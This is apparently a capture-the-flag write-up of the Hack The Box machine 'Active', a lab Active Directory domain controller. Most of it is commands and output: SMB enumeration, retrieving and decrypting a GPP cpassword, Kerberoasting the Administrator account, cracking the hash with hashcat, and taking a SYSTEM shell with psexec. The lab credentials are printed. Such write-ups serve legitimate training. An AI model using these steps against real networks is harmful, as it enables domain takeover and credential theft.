Active
Active is an easy active directory machine. This machine is OSCP-Like [Tj Null, Lainkusanagi] and CPTS-Like [ippsec, 0xdf]
First, I start with port scanning
rustscan -a 10.129.112.146
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
Open 10.129.112.146:53
Open 10.129.112.146:88
Open 10.129.112.146:135
Open 10.129.112.146:139
Open 10.129.112.146:389
Open 10.129.112.146:445
Open 10.129.112.146:464
Open 10.129.112.146:593
Open 10.129.112.146:636
Open 10.129.112.146:3268
Open 10.129.112.146:3269
Open 10.129.112.146:5722
Open 10.129.112.146:9389
Open 10.129.112.146:47001
Open 10.129.112.146:49152
Open 10.129.112.146:49153
Open 10.129.112.146:49157
Open 10.129.112.146:49155
Open 10.129.112.146:49158
Open 10.129.112.146:49162
Open 10.129.112.146:49154
Open 10.129.112.146:49169
Open 10.129.112.146:49166Enum Shares
First, start the enumeration with null authentication, and it's allowed. From the output, we can see the domain name and the hostname. So I will add them to the hosts file for the upcoming DNS mapping
nxc smb 10.129.112.146 -u '' -p ''
SMB 10.129.112.146 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.112.146 445 DC [+] active.htb\:echo "10.129.112.146 active.htb dc.active.htb" | sudo tee -a /etc/hosts > /dev/nullFound a share, we read its files. I will use the netexec module spider_plus to list its directories and files.
nxc smb 10.129.112.146 -u '' -p '' --shares
SMB 10.129.112.146 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.112.146 445 DC [+] active.htb\:
SMB 10.129.112.146 445 DC [*] Enumerated shares
SMB 10.129.112.146 445 DC Share Permissions Remark
SMB 10.129.112.146 445 DC ----- ----------- ------
SMB 10.129.112.146 445 DC ADMIN$ Remote Admin
SMB 10.129.112.146 445 DC C$ Default share
SMB 10.129.112.146 445 DC IPC$ Remote IPC
SMB 10.129.112.146 445 DC NETLOGON Logon server share
SMB 10.129.112.146 445 DC Replication READ
SMB 10.129.112.146 445 DC SYSVOL Logon server share
SMB 10.129.112.146 445 DC Users nxc smb 10.129.112.146 -u '' -p '' -M spider_plus
SMB 10.129.112.146 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.112.146 445 DC [+] active.htb\:
SPIDER_PLUS 10.129.112.146 445 DC [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.129.112.146 445 DC [*] DOWNLOAD_FLAG: False
SPIDER_PLUS 10.129.112.146 445 DC [*] STATS_FLAG: True
SPIDER_PLUS 10.129.112.146 445 DC [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.129.112.146 445 DC [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.129.112.146 445 DC [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.129.112.146 445 DC [*] OUTPUT_FOLDER: /home/legend/.nxc/modules/nxc_spider_plus
<snip>
SPIDER_PLUS 10.129.112.146 445 DC [+] Saved share-file metadata to "/home/legend/.nxc/modules/nxc_spider_plus/10.129.112.146.json".
SPIDER_PLUS 10.129.112.146 445 DC [*] SMB Shares: 7 (ADMIN$, C$, IPC$, NETLOGON, Replication, SYSVOL, Users)
SPIDER_PLUS 10.129.112.146 445 DC [*] SMB Readable Shares: 1 (Replication)
SPIDER_PLUS 10.129.112.146 445 DC [*] Total folders found: 22
SPIDER_PLUS 10.129.112.146 445 DC [*] Total files found: 7
SPIDER_PLUS 10.129.112.146 445 DC [*] File size average: 1.16 KB
SPIDER_PLUS 10.129.112.146 445 DC [*] File size min: 22 B
SPIDER_PLUS 10.129.112.146 445 DC [*] File size max: 3.63 KBNow I will copy the JSON file, which is the result of the module spider_plus, and view it in the terminal with better looking with jq
cp /home/legend/.nxc/modules/nxc_spider_plus/10.129.112.146.json .
cat 10.129.112.146.json | jq .{
"Replication": {
"active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI": {
"atime_epoch": "2018-07-21 06:37:44",
"ctime_epoch": "2018-07-21 06:37:44",
"mtime_epoch": "2018-07-21 06:38:11",
"size": "23 B"
},
"active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI": {
"atime_epoch": "2018-07-21 06:37:44",
"ctime_epoch": "2018-07-21 06:37:44",
"mtime_epoch": "2018-07-21 06:38:11",
"size": "119 B"
},
"active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
"atime_epoch": "2018-07-21 06:37:44",
"ctime_epoch": "2018-07-21 06:37:44",
"mtime_epoch": "2018-07-21 06:38:11",
"size": "1.07 KB"
},
"active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml": {
"atime_epoch": "2018-07-21 06:37:44",
"ctime_epoch": "2018-07-21 06:37:44",
"mtime_epoch": "2018-07-21 06:38:11",
"size": "533 B"
},
"active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol": {
"atime_epoch": "2018-07-21 06:37:44",
"ctime_epoch": "2018-07-21 06:37:44",
"mtime_epoch": "2018-07-21 06:38:11",
"size": "2.72 KB"
},
"active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI": {
"atime_epoch": "2018-07-21 06:37:44",
"ctime_epoch": "2018-07-21 06:37:44",
"mtime_epoch": "2018-07-21 06:38:11",
"size": "22 B"
},
"active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
"atime_epoch": "2018-07-21 06:37:44",
"ctime_epoch": "2018-07-21 06:37:44",
"mtime_epoch": "2018-07-21 06:38:11",
"size": "3.63 KB"
}
}
}Group Policy Preferences is a Windows feature that lets administrators manage settings for multiple machines across an Active Directory (AD) domain. With GPP, admins can control things like mapped drives, scheduled tasks, and registry settings. At one point, GPP also allowed passwords to be set for local accounts, but this practice was insecure as it allowed storing of passwords in an easily reversible format. Microsoft eventually removed that capability. [https://www.semperis.com/blog/group-policy-preferences-abuse-explained]
Out of those files, the most interesting is groups.xm, which may contain a password
nxc smb 10.129.112.146 -u '' -p '' --share Replication --get-file "active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml" Groups.xml
SMB 10.129.112.146 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.112.146 445 DC [+] active.htb\:
SMB 10.129.112.146 445 DC [*] Copying "active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml" to "Groups.xml"
SMB 10.129.112.146 445 DC [+] File "active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml" was downloaded to "Groups.xml"<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>Alternatively, we could have utilized netexec to search the files' content and search for anything like passw
nxc smb 10.129.112.146 -u '' -p '' --spider Replication --content --pattern "passw"
SMB 10.129.112.146 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.112.146 445 DC [+] active.htb\:
SMB 10.129.112.146 445 DC [*] Spidering .
SMB 10.129.112.146 445 DC //10.129.112.146/Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml [lastm:'2018-07-21 06:38' size:533 offset:533 pattern:'passw']Now we have a password to decrypt, and just by searching cpassword, we found this tool.
Here I download the tool and install its dependencies.
git clone https://github.com/t0thkr1s/gpp-decrypt.git
cd gpp-decrypt
sudo python3 setup.py installI passed the whole file, which is premsiable by the tool, and in the blink of an eye, the tool decrypted the hash
python3 gpp-decrypt.py -f ./groups.xml
__ __
___ _ ___ ___ ____ ___/ / ___ ____ ____ __ __ ___ / /_
/ _ `/ / _ \ / _ \/___// _ / / -_)/ __/ / __/ / // / / _ \/ __/
\_, / / .__/ / .__/ \_,_/ \__/ \__/ /_/ \_, / / .__/\__/
/___/ /_/ /_/ /___/ /_/
[ * ] Username: active.htb\SVC_TGS
[ * ] Password: GPPstillStandingStrong2k18Users share is allowed to read by SVC_TGS. But since this could take time to enumerate, i will move to execute any low-hanging fruit and then come back to it.
nxc smb 10.129.112.146 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --shares
SMB 10.129.112.146 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.112.146 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SMB 10.129.112.146 445 DC [*] Enumerated shares
SMB 10.129.112.146 445 DC Share Permissions Remark
SMB 10.129.112.146 445 DC ----- ----------- ------
SMB 10.129.112.146 445 DC ADMIN$ Remote Admin
SMB 10.129.112.146 445 DC C$ Default share
SMB 10.129.112.146 445 DC IPC$ Remote IPC
SMB 10.129.112.146 445 DC NETLOGON READ Logon server share
SMB 10.129.112.146 445 DC Replication READ
SMB 10.129.112.146 445 DC SYSVOL READ Logon server share
SMB 10.129.112.146 445 DC Users READ Analysing this account can't find anything interesting, but its name.
nxc ldap 10.129.112.146 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --query "(sAMAccountName=SVC_TGS)" ""
LDAP 10.129.112.146 389 DC [*] Windows 7 / Server 2008 R2 Build 7601 (name:DC) (domain:active.htb) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.112.146 389 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
LDAP 10.129.112.146 389 DC [+] Response for object: CN=SVC_TGS,CN=Users,DC=active,DC=htb
LDAP 10.129.112.146 389 DC objectClass top
LDAP 10.129.112.146 389 DC person
LDAP 10.129.112.146 389 DC organizationalPerson
LDAP 10.129.112.146 389 DC user
LDAP 10.129.112.146 389 DC cn SVC_TGS
LDAP 10.129.112.146 389 DC distinguishedName CN=SVC_TGS,CN=Users,DC=active,DC=htb
LDAP 10.129.112.146 389 DC instanceType 4
LDAP 10.129.112.146 389 DC whenCreated 20180718201438.0Z
LDAP 10.129.112.146 389 DC whenChanged 20250725214551.0Z
LDAP 10.129.112.146 389 DC displayName SVC_TGS
LDAP 10.129.112.146 389 DC uSNCreated 20508
LDAP 10.129.112.146 389 DC uSNChanged 110721
LDAP 10.129.112.146 389 DC name SVC_TGS
LDAP 10.129.112.146 389 DC objectGUID 35329d8c-0a1d-b14d-99ee-3f783d1a9bd6
LDAP 10.129.112.146 389 DC userAccountControl 66048
LDAP 10.129.112.146 389 DC badPwdCount 0
LDAP 10.129.112.146 389 DC codePage 0
LDAP 10.129.112.146 389 DC countryCode 0
LDAP 10.129.112.146 389 DC badPasswordTime 0
LDAP 10.129.112.146 389 DC lastLogoff 0
LDAP 10.129.112.146 389 DC lastLogon 133979542348967192
LDAP 10.129.112.146 389 DC pwdLastSet 131764184784027640
LDAP 10.129.112.146 389 DC primaryGroupID 513
LDAP 10.129.112.146 389 DC objectSid S-1-5-21-405608879-3187717380-1996298813-1103
LDAP 10.129.112.146 389 DC accountExpires 9223372036854775807
LDAP 10.129.112.146 389 DC logonCount 7
LDAP 10.129.112.146 389 DC sAMAccountName SVC_TGS
LDAP 10.129.112.146 389 DC sAMAccountType 805306368
LDAP 10.129.112.146 389 DC userPrincipalName [email protected]
LDAP 10.129.112.146 389 DC objectCategory CN=Person,CN=Schema,CN=Configuration,DC=active,DC=htb
LDAP 10.129.112.146 389 DC dSCorePropagationData 20180718201438.0Z
LDAP 10.129.112.146 389 DC 16010101000000.0Z
LDAP 10.129.112.146 389 DC lastLogonTimestamp 133979535515687190TGS stands for Ticket Granting Service, which is related to Kerberos. So let's see what we can do with it
The goal of Kerberoasting is to harvest TGS tickets for services that run on behalf of user accounts in the AD, not computer accounts. Thus, part of these TGS tickets is encrypted with keys derived from user passwords. As a consequence, their credentials could be cracked offline.
nxc ldap 10.129.112.146 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --kerberoasting output.txt
LDAP 10.129.112.146 389 DC [*] Windows 7 / Server 2008 R2 Build 7601 (name:DC) (domain:active.htb) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.112.146 389 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
LDAP 10.129.112.146 389 DC [*] Skipping disabled account: krbtgt
LDAP 10.129.112.146 389 DC [*] Total of records returned 1
LDAP 10.129.112.146 389 DC [*] sAMAccountName: Administrator, memberOf: ['CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb', 'CN=Domain Admins,CN=Users,DC=active,DC=htb', 'CN=Enterprise Admins,CN=Users,DC=active,DC=htb', 'CN=Schema Admins,CN=Users,DC=active,DC=htb', 'CN=Administrators,CN=Builtin,DC=active,DC=htb'], pwdLastSet: 2018-07-18 15:06:40.351723, lastLogon: 2025-07-25 17:21:27.880548
LDAP 10.129.112.146 389 DC $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb\Administrator*$acc026cf097b0a59f8ec375bdf6c64dc$<snip>And we have Administrator Kerberos TGS-REP hash. Now let's check hashcat mode for it
I'm using hashcat on the bare OS, which is Windows in my case, to use the GPU for fast cracking.
C:\Users\abdelrazek\Downloads\hashcat-6.2.6>hashcat.exe -m 13100 output.txt rockyou.txt
hashcat (v6.2.6) starting
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb\Administrator*$acc026cf097b0<snip>:Ticketmaster1968
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb\Ad...9afcf5
Time.Started.....: Sat Jul 26 01:00:30 2025 (2 secs)
Time.Estimated...: Sat Jul 26 01:00:32 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 7998.8 kH/s (6.62ms) @ Accel:512 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10813440/14344384 (75.38%)
Rejected.........: 0/10813440 (0.00%)
Restore.Point....: 10321920/14344384 (71.96%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: ahki14 -> Ms.Jordan
Hardware.Mon.#1..: Temp: 55c Fan: 0% Util: 33% Core:1455MHz Mem:6801MHz Bus:16
Started: Sat Jul 26 01:00:28 2025
Stopped: Sat Jul 26 01:00:32 2025nxc smb 10.129.112.146 -u 'Administrator' -p 'Ticketmaster1968'
SMB 10.129.112.146 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.112.146 445 DC [+] active.htb\Administrator:Ticketmaster1968 (Pwn3d!)Since WinRM isn't available on this machine, we use psexec to get a shell
impacket-psexec active.htb/Administrator:[email protected]
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.129.112.146.....
[*] Found writable share ADMIN$
[*] Uploading file VPsIZKda.exe
[*] Opening SVCManager on 10.129.112.146.....
[*] Creating service nzvU on 10.129.112.146.....
[*] Starting service nzvU.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\systemLast updated
Was this helpful?